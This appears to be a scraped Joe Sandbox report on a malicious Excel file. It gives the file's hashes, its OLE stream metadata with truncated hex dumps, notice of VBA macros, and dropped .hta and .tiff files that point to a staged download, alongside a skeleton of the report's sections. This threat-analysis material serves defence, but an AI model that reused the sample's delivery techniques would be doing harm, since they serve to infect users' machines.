Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M[g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................5.......v.....v.......................................... <.....P ......N.........T.....^.....g.....i.....r...N.....N...!.N.....N.......!............<.......................................%..........<Module>.40

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Dec 12 06:12:44 2024, Security: 1
Entropy (8bit):	7.753748657327232
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Cot90012ARCACONTAL.xls
File size:	1'058'816 bytes
MD5:	9e57f8d11355afc490feb9cb415165d3
SHA1:	f63ad72689cdabc1aa7629a1170debb01f40c207
SHA256:	60e0542a30b9379d93ab606396a96476b7d7f40a0b870fa648911eb66bed1348
SHA512:	ac55420d054d022ffe6dc8a7e0763e908cf123705e672ffc9ffa740fa8c474a2620e365b19946f07d1d02d926440f6630da6d574122f3e8f6e1bc3158a7935ba
SSDEEP:	12288:/8fmzHJEUiOIBUzMTS1D3DERnLRmF8DXEPzxpsAQx1Zj+j0EPSbsZM1+cXO1qzaS:LBawbARM8aj8Z+jLp3lYzaFzF
TLSH:	383501E1B78DAB51CA0A523571F3536E1710AC13E902567737F873282AF76D08A07F9A
File Content Preview:	........................>........................................................... ...!..."...O...P...Q..............._.......\|.......~......................................................................................................................

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-12-12 06:12:44
Creating Application:	Microsoft Excel
Security:	1

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

General
Stream Path:	MBD005CAF36/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.2403503175049813
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . r \\ L . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

General
Stream Path:	MBD005CAF35/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD005CAF35/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	12479
Entropy:	7.09513886571729
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a7 95 f9 99 84 01 00 00 14 06 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD005CAF36/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD005CAF36/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.701136490257069
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00

General
Stream Path:	MBD005CAF36/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	220
Entropy:	3.372234242231489
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	MBD005CAF36/MBD0018D4CE/\x1Ole
CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.5689955935892812
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD005CAF36/MBD0018D4CE/\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	4
Entropy:	0.8112781244591328
Base64 Encoded:	False
Data ASCII:	. . . .
Data Raw:	00 00 03 00

General
Stream Path:	MBD005CAF36/MBD0018D4CE/Contents
CLSID:
File Type:	Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
Stream Size:	197671
Entropy:	6.989042939766534
Base64 Encoded:	True
Data ASCII:	C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD005CAF36/MBD0068D442/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.219515110876372
Base64 Encoded:	False
Data ASCII:	. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Cot90012ARCACONTAL.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamkissingthingswithcreambananapackagecreamy[1].hta

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\creamykissinglipsgoodforcreamythingswithcreamicream[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1EE8867E.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31A40A15.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F10392F.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4032A164.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59B30867.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9B62287A.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB21F698.emf

Windows Analysis Report
Cot90012ARCACONTAL.xls

General
Stream Path:	MBD005CAF36/MBD0068D442/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	26243
Entropy:	7.635433729726103
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD005CAF36/MBD007203CB/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD005CAF36/MBD007203CB/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	248
Entropy:	3.0523231150355867
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	MBD005CAF36/MBD007203CB/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	256
Entropy:	4.086306928392587
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c \| E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	MBD005CAF36/MBD007203CB/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	134792
Entropy:	7.974168320310173
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a

General
Stream Path:	MBD005CAF36/MBD00726B69/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.219515110876372
Base64 Encoded:	False
Data ASCII:	. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD005CAF36/MBD00726B69/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	26242
Entropy:	7.635424485665502
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD005CAF36/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	283872
Entropy:	7.743278150467805
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

General
Stream Path:	MBD005CAF37/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD005CAF37/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	45934
Entropy:	7.5587990853484195
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00